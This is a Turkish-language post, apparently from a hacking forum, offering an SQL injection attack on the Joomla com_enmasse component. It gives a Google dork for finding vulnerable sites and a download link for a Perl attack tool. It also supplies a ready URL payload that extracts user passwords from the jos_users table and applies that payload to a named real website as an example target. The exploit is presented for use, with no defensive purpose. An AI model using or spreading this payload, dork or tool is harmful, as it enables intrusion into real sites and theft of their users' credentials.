Açık joomlada mevcuttur.
Açıklı Versiyon: 1.2.0.4 (last update on Jul 27, 2012)
Dork: inurl:index.php?option=com_enmasse
Derleme : ynR !
Deneme görsellleri :
[IMG]http://fmslow.com/ynr/ynr-01.jpg[/IMG]
[IMG]http://fmslow.com/ynr/ynr-02.jpg[/IMG]
[IMG]http://fmslow.com/ynr/ynr-03.jpg[/IMG]
[IMG]http://fmslow.com/ynr/ynr-04.jpg[/IMG]
Benim kullandığım perl idi. İsteyenler illaki olacaktır. Perl'i de vereceğim. dosyanın çalışması için ActivePerl uygulamasının yüklü olması gerekmektedir. Yükleyenler Yerel Disk C > Perl64 > bin dosyasına ynr.pl'yi atsınlar.
İllaki güvenmeyen de olacak. Onlar için de başka bir kullanım vereyim.
Dork yine aynı. www.siteadi.com'dan itibaren şu kodu yapıştırıp sayfaya gidin ;)
Kod:
/index.php?categoryId=1&controller=deal&keyword=1&********Id=1&option=com_enmasse&sortBy=117 and(select 1 from(select count(*),concat((select (select (select concat(password) from jos_users Order by username limit 0,1) ) from `information_schema`.tables limit 0%2C1)%2Cfloor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
Perl İndirme Linki : http://fmslow.com/ynr/ynr.rar
VirüsTotal Sonucu : https://www.virustotal.com/file/2750b8edb173909bb39e5e80f66c63acdf4d98d2dc7179c6a9d6035b2f6d49e1/analysis/1350285033/
Kod:
Örnek Site : http://www.findsports.co.uk/index.php?categoryId=1&controller=deal&keyword=1&********Id=1&option=com_enmasse&sortBy=117%20and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(password)%20from%20jos_users%20Order%20by%20username%20limit%200,1)%20)%20from%20`information_schema`.tables%20limit%200%2C1)%2Cfloor(rand(0)*2))x%20from%20`information_schema`.tables%20group%20by%20x)a)%20and%201=1
]